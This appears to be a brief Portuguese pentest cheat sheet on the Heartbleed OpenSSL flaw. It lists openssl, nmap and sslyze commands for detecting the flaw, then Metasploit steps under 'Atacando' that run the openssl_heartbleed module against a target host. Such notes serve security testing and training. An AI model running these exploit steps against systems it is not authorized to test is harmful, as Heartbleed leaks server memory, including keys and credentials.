Heartbleed
Verificando Vulnerbilidade
OpenSSL
echo -e "quit\n" | openssl s_client -connect <sitevulneravel.com>:443 -tlsextdebug | grep -i "TLS server extension"Nmap
nmap -sS -n -p80,443 --script ssl-heartbleed <www.sitevulneravel.com.br>sslyze
sslyze --heartbleed <ip>Atacando
Metasploit
msfconsole
use auxiliary/scanner/ssl/openssl_heartbleed
set RHOST <ip_alvo>
set VERBOSE true
exploitLast updated